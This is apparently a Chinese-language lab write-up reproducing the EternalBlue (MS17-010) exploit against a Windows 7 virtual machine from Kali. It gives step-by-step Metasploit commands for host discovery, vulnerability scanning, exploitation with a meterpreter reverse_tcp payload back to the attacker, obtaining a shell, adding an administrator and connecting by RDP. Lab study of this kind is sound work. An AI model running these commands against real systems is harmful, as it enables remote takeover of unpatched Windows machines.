永恒之蓝ms17_010复现笔记详解

简单的讲解一下永恒之蓝的复现过程.在这个漏洞中利用的是445端口来进行攻击渗透的。

本次实验的环境:

攻击机为kali: 192.168.233.131

目标主机为windows 7 旗舰版:处于nat网络下的虚拟机 192.168.233.144

为了更方便的实现复现,关闭目标主机的防火墙,之后开启目标主机就没他什么事了

第一步老样子,探测同一局域网的存活主机:

nmap -sP 192.168.233.1/24

或者使用:

arp-scan -l

 永恒之蓝ms17_010复现笔记详解_第1张图片

下一步就是用nmap进行端口探测:

nmap -sT -A -p0 192.168.233.144

 永恒之蓝ms17_010复现笔记详解_第2张图片

这里我们看到有445以及3389端口可以进行利用,咱们这次主要是利用445端口来获取目标主机的meterpreter权限以及cmd权限

开始利用kali进行模块搜索:

search ms17_010

 永恒之蓝ms17_010复现笔记详解_第3张图片

咱们这里主要就是用这两个来进行攻击的,一个是辅助模块用来检查远程主机是否含有这个漏洞的另一个是攻击模块了,可以直接拿到cm权限。

 

先利用辅助模块来验证一下是否存在着这个漏洞吧:

use auxiliary/scanner/smb/smb_ms17_010

show options

sset RHOSTS 192.168.233.144

run 

 

发现是存在漏洞的:

 永恒之蓝ms17_010复现笔记详解_第4张图片

利用攻击模块进行攻击:

use exploit/windows/smb/ms17_010_eternalblue

show options 

set RHOSTS 192.168.233.144

exploit

这样可以直接拿到cmd权限,但是呢我现在想拿到meterpreter的shell应该怎么做呢?

有两种方法第一种比较麻烦,也不普遍:那就是用msfvenom 生成一个exe后门程序上传到目标主机上并在目标主机上运行,(这似乎有点难度)

所以我就用简单点的方法,就是选择攻击模块的时候,下一步选择一个meterpreter/reverse_tcp的一个payload

use exploit/windows/smb/ms17_010_eternalblue

 

show options 

 

set RHOSTS 192.168.233.144

 

set payload windows/x64/meterpreter/reverse_tcp

 

show options 

 

set LHOST 192.168.233.131

 

exploit

 永恒之蓝ms17_010复现笔记详解_第5张图片

完成已经获取meterpreter

输入命令shell即可进入cmd权限,这是就可以直接创建管理员用户用kali来连接远程主机

rdesktop 192.168.233.144:3389

即可操作目标主机了

 

 

你可能感兴趣的:(web)